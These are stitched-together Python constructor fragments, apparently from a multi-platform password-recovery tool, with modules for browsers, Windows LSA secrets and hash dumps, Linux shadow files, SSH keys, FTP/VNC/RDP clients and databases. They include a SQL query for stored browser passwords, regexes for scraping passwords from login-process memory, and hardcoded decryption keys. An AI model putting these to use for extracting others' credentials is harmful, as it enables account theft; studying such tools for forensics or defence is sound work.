def __init__(self): self.appid = 'Get KDE keyring' self.bus_info = [ ('org.kde.kwalletd', '/modules/kwalletd'), ('org.kde.kwalletd5', '/modules/kwalletd5') ] ModuleInfo.__init__(self, 'kwallet', 'wallet')
def __init__(self): ModuleInfo.__init__(self, 'hashdump', 'system') self.username = None self.iterations = None self.salt_hex = None self.entropy_hex = None
def __init__(self, safe_storage_key=None): ModuleInfo.__init__(self, 'chrome', 'browsers') login_data_path = '/Users/*/Library/Application Support/Google/Chrome/*/Login Data' cc_data_path = '/Users/*/Library/Application Support/Google/Chrome/*/Web Data' self.chrome_data = glob.glob(login_data_path) + glob.glob(cc_data_path) self.safe_storage_key = safe_storage_key
def __init__(self): ModuleInfo.__init__(self, 'robomongo', 'databases') self.paths = [ { 'directory': u'.config/robomongo', 'filename': u'robomongo.json', }, { 'directory': u'.3T/robo-3t/1.1.1', 'filename': u'robo3t.json', } ]
def __init__(self): ModuleInfo.__init__(self, 'mimipy', 'memory') self.shadow_hashes = [] self.rules = [ { "desc": "[SYSTEM - GNOME]", "process": r"gnome-keyring-daemon|gdm-password|gdm-session-worker", "near": r"libgcrypt\.so\..+|libgck\-1\.so\.0|_pammodutil_getpwnam_|gkr_system_authtok", "func": self.test_shadow, }, { "desc": "[SYSTEM - LightDM]", # Ubuntu/xubuntu login screen :) https://doc.ubuntu-fr.org/lightdm "process": r"lightdm", "near": r"_pammodutil_getpwnam_|gkr_system_authtok", "func": self.test_shadow, }, { "desc": "[SYSTEM - SSH Server]", "process": r"/sshd$", "near": r"sudo.+|_pammodutil_getpwnam_", "func": self.test_shadow, }, { "desc": "[SSH Client]", "process": r"/ssh$", "near": r"sudo.+|/tmp/ICE-unix/[0-9]+", "func": self.test_shadow, }, { "desc": "[SYSTEM - VSFTPD]", "process": r"vsftpd", "near": r"^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$", "func": self.test_shadow, }, ] regex_type = type(re.compile("^plop$")) # precompile regexes to optimize speed for x in self.rules: if "near" in x: if type(x["near"]) != regex_type: x["near"] = re.compile(x["near"]) if "process" in x: if type(x["process"]) != regex_type: x["process"] = re.compile(x["process"]) self.look_after_size = 1000 * 10 ** 3 self.look_before_size = 500 * 10 ** 3
def __init__(self): ModuleInfo.__init__(self, 'lsa_secrets', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'coreftp', 'sysadmin') self._secret = "hdfzpysvpzimorhk"
def __init__(self): ModuleInfo.__init__(self, 'mscache', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'apachedirectorystudio', 'sysadmin') # Interesting XML attributes in ADS connection configuration self.attr_to_extract = ["host", "port", "bindPrincipal", "bindPassword", "authMethod"]
def __init__(self): ModuleInfo.__init__(self, 'keepass', 'memory')
def __init__(self): ModuleInfo.__init__(self, 'clawsmail', 'mails')
def __init__(self): ModuleInfo.__init__(self, 'sqldeveloper', 'databases') self._salt = self.get_salt() self._passphrase = None self._iteration = 42
def __init__(self): ModuleInfo.__init__(self, 'credfiles', 'windows', dpapi_used=True)
def __init__(self): ModuleInfo.__init__(self, 'gitforwindows', 'git')
def __init__(self, browser_name, paths): self.paths = paths if isinstance(paths, list) else [paths] self.database_query = 'SELECT action_url, username_value, password_value FROM logins' ModuleInfo.__init__(self, browser_name, 'browsers', dpapi_used=True)
def __init__(self, browser_name, path): self.path = os.path.expanduser(path) ModuleInfo.__init__(self, browser_name, category='browsers')
def __init__(self): self.pwd_found = [] ModuleInfo.__init__(self, 'psi-im', 'chats')
def __init__(self): ModuleInfo.__init__(self, name='postgresql', category='databases')
def __init__(self): ModuleInfo.__init__(self, name='postgresql', category='databases')
def __init__(self): ModuleInfo.__init__(self, 'hashdump', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'unattended', 'sysadmin', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'coreftp', 'sysadmin') self._secret = "hdfzpysvpzimorhk"
def __init__(self): ModuleInfo.__init__(self, 'mavenrepositories', 'maven') # Interesting XML nodes in Maven repository configuration self.nodes_to_extract = ["id", "username", "password", "privateKey", "passphrase"] self.settings_namespace = "{http://maven.apache.org/SETTINGS/1.0.0}"
def __init__(self): ModuleInfo.__init__(self, 'pypykatz', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'cli', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'pidgin', 'chats')
def __init__(self): ModuleInfo.__init__(self, name='squirrel', category='databases')
def __init__(self): ModuleInfo.__init__(self, 'winscp', 'sysadmin', registry_used=True) self.hash = ''
def __init__(self): ModuleInfo.__init__(self, 'pidgin', 'chats')
def __init__(self): ModuleInfo.__init__(self, 'shadow', 'sysadmin')
def __init__(self, browser_name, path): self.path = path ModuleInfo.__init__(self, browser_name, 'browsers')
def __init__(self): ModuleInfo.__init__(self, name='dbvis', category='databases') self._salt = self.get_salt() self._passphrase = 'qinda' self._iteration = 10
def __init__(self): ModuleInfo.__init__(self, 'wifi', 'wifi')
def __init__(self): ModuleInfo.__init__(self, 'autologon', 'windows', registry_used=True, system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'filezilla', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'rdpmanager', 'sysadmin', dpapi_used=True)
def __init__(self, browser_name, path): self.path = path ModuleInfo.__init__(self, browser_name, 'browsers')
def __init__(self): ModuleInfo.__init__(self, 'windows', 'windows')
def __init__(self): ModuleInfo.__init__(self, 'mscache', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'gitforlinux', 'git')
def __init__(self): ModuleInfo.__init__(self, 'opensshforwindows', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'vault', 'windows', only_from_current_user=True)
def __init__(self): ModuleInfo.__init__(self, 'fstab', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'puttycm', 'sysadmin', registry_used=True)
def __init__(self): ModuleInfo.__init__(self, 'rdpmanager', 'sysadmin', winapi_used=True)
def __init__(self): ModuleInfo.__init__(self, 'opera', 'browsers')
def __init__(self): ModuleInfo.__init__(self, 'lsa_secrets', 'windows', system_module=True)
def __init__(self): ModuleInfo.__init__(self, 'roguestale', 'games')
def __init__(self, browser_name, paths): self.paths = paths if isinstance(paths, list) else [paths] self.database_query = 'SELECT action_url, username_value, password_value FROM logins' ModuleInfo.__init__(self, browser_name, 'browsers', winapi_used=True)
def __init__(self): ModuleInfo.__init__(self, 'system', 'system')
def __init__(self): ModuleInfo.__init__(self, 'tortoise', 'svn', winapi_used=True)
def __init__(self): ModuleInfo.__init__(self, 'opensshforwindows', 'sysadmin') self.key_files_location = os.path.join(constant.profile["USERPROFILE"], u'.ssh')
def __init__(self): self.vnckey = [23, 82, 107, 6, 35, 78, 88, 7] ModuleInfo.__init__(self, name='vnc', category='sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'grub', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'apachedirectorystudio', 'sysadmin') # Interesting XML attributes in ADS connection configuration self.attr_to_extract = ["host", "port", "bindPrincipal", "bindPassword", "authMethod"]
def __init__(self): ModuleInfo.__init__(self, 'filezilla', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'shadow', 'sysadmin')
def __init__(self): ModuleInfo.__init__(self, 'opera', 'browsers')
def __init__(self): ModuleInfo.__init__(self, 'kalypsomedia', 'games')
def __init__(self): ModuleInfo.__init__(self, 'galconfusion', 'games', registry_used=True)